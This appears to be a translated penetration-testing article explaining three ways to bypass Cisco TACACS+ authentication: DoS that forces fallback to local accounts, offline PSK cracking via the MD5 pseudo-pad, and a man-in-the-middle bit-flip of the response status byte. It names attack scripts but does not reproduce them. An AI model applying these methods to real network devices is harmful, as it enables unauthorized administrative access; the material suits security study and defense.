Three attack methods bypass Cisco TACACS +

Three attack methods bypass Cisco TACACS +

Original article: 3 attacks on cisco tacacs bypassing

In this article, the author introduces three methods to bypass TACACS on Cisco devices.

No.1 DoS attacks bypass Cisco TACACS + No. 2 Local cracking PSK bypass Cisco TACACS + No. 3 man-in-the-middle attack bypass Cisco TACACS +

In general, there are many network devices in a large network, and how to manage the access permissions of these network devices may be a big problem. Therefore, most companies implement centralized access protocols. Cisco devices support TACACS + and RADIUS protocols.

0x00 TACACS Protocol Introduction

TACACS (Terminal Access Controller Access Control System, Terminal Access Controller Control System Protocol) is a computer protocol used for authentication. It communicates with the authentication server on a UNIX network, TACACS allows remote access to the server to communicate with the authentication server to determine whether the user has the permission to access the network.

TACACS allows the client to accept the user name and password and send it to a TACACS authentication server, usually called the TACACS daemon (or simply called TACACSD). This server is generally a program running on the host. The host will decide whether to accept or reject the request and return a response concurrently. TIP (the route node that the user wants to log on to that node to receive the dial-in link) will accept or reject access based on this response. In this way, the decision-making process is "Open up" (opened up). The algorithm and data used to make the decision are completely controlled by the operator of the TACACS daemon.

The latest TACACS version introduced by Cisco in 1990 is called XTACACS (Extended TACACS ). In newer or newer networks, most of these two versions are replaced by TACACS + and RADIUS.

TACACS is defined in RFC 1492. Port 49 of TCP or UDP is used by default.

0x01 TACACS + Protocol Introduction

TACACS + is a brand new protocol that is not compatible with TACACS and XTACACS. The port used by TACACS + is TCP/49.

TACACS + (Terminal Access Controller Access Control System Plus) is a security protocol that enhances functionality based on the TACACS protocol. Similar to the RADIUS protocol, this protocol uses Client/Server mode to implement communication between NAS and TACACS + servers.

The TACACS + protocol is mainly used for accessing user and end user AAA through PPP and VPDN (Virtual Private Dial-up Network.

AAA is short for Authentication, Authorization, and Accounting (Authentication, Authorization, and billing). It is a management mechanism of network security and provides three security functions: Authentication, Authorization, and billing.

Authentication: confirm the identity of the remote user accessing the network and determine whether the visitor is a valid network user. Authorization: grant different permissions to different users to restrict services that users can use. For example, after a user successfully logs on to the server, the administrator can authorize the user to access and print files on the server. Billing: It records all the operations in the user's network service, including the service type, start time, and data traffic. It is not only a billing method, it also monitors network security. 0x02 TACACS + authentication process

The TACACS + service usually has a special server. All network devices are configured to use the TACACS + server for authentication. When a user authenticates on a vswitch, router, or other network devices, the network device sends the user's creden to the tacacs + server for verification, and then decides to assign permissions to access the relevant devices, the results are included in the response packet and sent to the network device. Then, the network device sends the results to the user terminal.

Figure 1: TACACS + authentication process

This is a very convenient and centralized approach. You can set different permissions for users on different devices. In addition, the access and operations are recorded on the server side. You can also add a centralized management method in the current mode, such as Active Directory or LDAP. However, Cisco has published TACACS + protocol specifications, so now we have an open-source implementation of TACACS + service.

0x03 three attack methods used to bypass Cisco TACACS + No.1 DoS attacks bypass Cisco TACACS +

The first attack method is not an attack type. It is a skill, but sometimes it is very useful in some cases.

Let's assume that this scenario:

A penetration engineer downloads the configuration file of the Cisco device from the TFTP server of the target company, but even if the login account information of the device is cracked by using the configuration file, still unable to log on to the device because the device will use the TACACS + service to verify the local account.

Using TACACS + for authentication is a typical configuration of network devices. Let's continue to assume that the network device cannot access the TACACS + server because of what happened between the TACACS + server and the network device. In this case, the administrator cannot log on to the network device. To solve such a typical situation, Cisco devices support the rollback of authentication methods. administrators can set different Authentication configurations.

In a Cisco device, a typical configuration for authentication using TACACS + is as follows:

aaa authentication login default group tacacs+ local

The preceding configuration indicates that the preferred authentication method is TACACS +, and then the local authentication method (querying the local database) is used for authentication. At the same time, it should be noted that even if the TACACS + service does not find a user's authentication credential, the device will not use the local authentication method.

That is, the local authentication method is used only when the TACACS + service is unavailable.

Therefore, the first attack method is simple. We only need to launch DoS attacks against the TACACS + service, and then connect to the Local Account of the Cisco device (downloaded from the TFTP server and cracked ). Because the TACACS + service is not accessible due to DoS attacks, the network device will provide us with the expected access permissions. We can use multiple DoS attacks. For example, we can launch a temporary DoS attack to create a large number of TCP-based connections to the TACACS + server.

Figure 2 DoS attacks against TACACS + servers

Knowledge required before introducing the second and third attack methods

Before introducing the second and third attack methods, we need to understand the TACACS + protocol. The data of this protocol is transmitted in plaintext or encrypted format. A user-defined encryption method based on PSK (pre-shared key) is adopted. The administrator can set an encryption key on the TACACS + server. This encryption key is used for authentication as long as network devices that can access the TACACS + server.

It is worth noting that only the user's credential data is encrypted, and the header information of the TACACS + protocol is not encrypted.

The encryption details are as follows:

The encrypted result (enc_data) is obtained after the unencrypted user's creden data (data) and a special string (pseudo _ pad) perform the XOR operation.

data^pseudo_pad = enc_data

Pseudo _ pad is the MD5 hash of several spliced objects.

pseudo_pad = {MD5_1 [,MD5_2 [ ... ,MD5_n]]}

The MD5 hash value is the encryption result of TACACS + packet header information, key (PSK) and the previous MD5 hash value. Therefore, we can see that the first MD5 does not have the previous MD5 hash value.

MD5_1 = MD5{session_id, key, version, seq_no}MD5_2 = MD5{session_id, key, version, seq_no, MD5_1}....MD5_n = MD5{session_id, key, version, seq_no, MD5_n-1}

SESSION_ID is a random identifier of a session; version-TACACS + Protocol version; seq_no-incremental session data packets; key-PSK.

Shows the encrypted data:

Figure 3: Encrypted data in a data packet

No. 2 cracked PSK bypass Cisco TACACS +

OK. After learning about the above knowledge, we can understand the following two attack methods.

Assuming that there is a Cisco network device and a TACACS + server, we have obtained the encrypted data of the TACACS + protocol transmitted between the two servers (which can be obtained through man-in-the-middle attacks ). Now, we only need to get the PSK to decrypt the encrypted data, and then we can get a valid account.

Now let's see how to do this. First, we can see that any MD5 Hash (especially the first MD5) is composed of several fixed values. However, only one of them is unknown-PSK. All other values (SESSION_ID, version, seq_no) can be obtained from the header of the TACACS + data packet. Therefore, we can use the local offline brute-force cracking method to obtain PSK. We know that brute-force MD5 cracking is fast. But before starting the brute-force cracking, we need to obtain the first MD5 Hash (MD5_1).

We know that XOR is a reversible operation. So we can do this.

data^pseudo_pad = enc_data

Convert it

pseudo_pad = data^enc_data

MD5_1 is only the first part of the pseudo-pad. The size of the pseudo _ pad is 128 bits (or 16 bytes ). If we want to get MD5_1, we need to know the 16-byte encrypted and decrypted data, that is, (data ). We can obtain encrypted data from transmitted data packets. However, how can we get 16 bytes of decrypted data now?

Note that the request and response formats of TACACS + data packets for authentication, authorization, and billing are different. However, for these different data packets, I have a general idea because there are almost no unknown or random values in the first 16 bytes of any type of data packets.

I will not go into the technical details of each data packet type. Here is an example to illustrate this idea. This is the first data packet that the TACACS + server responds to (as shown in ). It consists of several meaningless fields and a greeting message sent from a Cisco device to a user. Because we can connect to any Cisco device, we can easily get the response packet and know the values of all fields.

Figure 4: First data packet in response of TACACS + server

Therefore, at present, we can almost always know the first 16 bytes of decrypted data of any data packet. Therefore, we can obtain MD5_1 and use local offline brute force cracking to launch attacks. If the attack succeeds, we can decrypt the entire communication data. To simplify packet receipt and parse MD5_1, I wrote a small script named tac2cat. py. It is part of the TacoTaco project.

No. 3 using man-in-the-middle attacks to bypass Cisco TACACS +

For the last attack method, we can use man-in-the-middle attacks to tamper with the data transmitted between TACACS + servers and Cisco devices. Our goal is to get all the permissions for Cisco devices.

When I rechecked the TACACS + protocol, I found two additional "Features ".

The first is that the integrity of data packets is not checked during TACACS + protocol transmission. Therefore, if we use a man-in-the-middle attack to change the encrypted part in the transmission, the decryption result will be changed (because it only performs XOR operations ), however, the TACACS + server does not discover the changes and processes the modified transmission data in a normal way.

Figure 5 TACACS + protocol data packets

The second feature is the format of TACACS + data packets. During authentication and authorization, the first byte in the response packet indicates the result of the access permission granting.

For example, "0x01" indicates that the user has passed the authentication process (access permission granted) of the server, and "0x02" indicates that the user's creden。 are invalid.

In short, we only need to change one byte of the server response packet!

Get the pseudo-pad of this Byte: Perform the XOR operation on the encrypted byte and decrypted byte (we know the value of the decrypted byte, because if we enter incorrect creden, the server rejects access and sets the first byte to 0x02. Perform the XOR operation on the pseudo _ pad and the successful ID (0x01) to add the new bytes to the encrypted data packet and send it to the server.

Therefore, using man-in-the-middle attacks, we can change the transmission data and access permissions (identity authentication and authorization) of any user who uses invalid creden. In addition, we can bypass the authentication process for a special user ("enable" password) on a Cisco device.

To facilitate man-in-the-middle attacks, I wrote a small script named tacflip. py, which is part of the TacoTaco project.

I have successfully verified this (bypass authentication and privileged user authorization) attack method in the GNS3 simulator of the Cisco 7200 router and the open-source TACACS + server-tac_plus, the following is part of the configuration file in the vro:

aaa authentication login default group tacacs+ localaaa authentication enable default group tacacs+aaa authorization exec default group tacacs+ localtacacs-server host 192.168.182.136tacacs-server directed-requesttacacs-server key 12345

This small video demonstrates the Attack Process of bypassing authentication/authorization, privilege elevation and command execution on Cisco routes.

Click here to watch the video.

0x04 digress

In 2000, Solar Designer made an interesting research on the TACACS + protocol (link here). For example, he found a replay attack and the user password length information leaked, bit flip attack and other vulnerabilities. However, I did not find any PoCs with these vulnerabilities.

My "research" on the TACACS + protocol is some of my thoughts for a long time after random interaction with the protocol. Because of this, I forgot the results of my Solar Designer study and re-understood some of his findings.

Therefore, the most important result of my work may be the TacoTaco project. It is the specific implementation of the attack methods described in this article.

0x05 Summary

Currently, I believe that the TACACS + Protocol does not provide the necessary protection level for man-in-the-middle attacks.

However, once again, it is sometimes difficult to perform all these attack operations in practice, because Cisco recommends placing TACACS + servers in a special management mode-VLAN (only accessible to administrators and network devices ). Of course, there are also ways to penetrate into the VLAN and control it, but this is another code.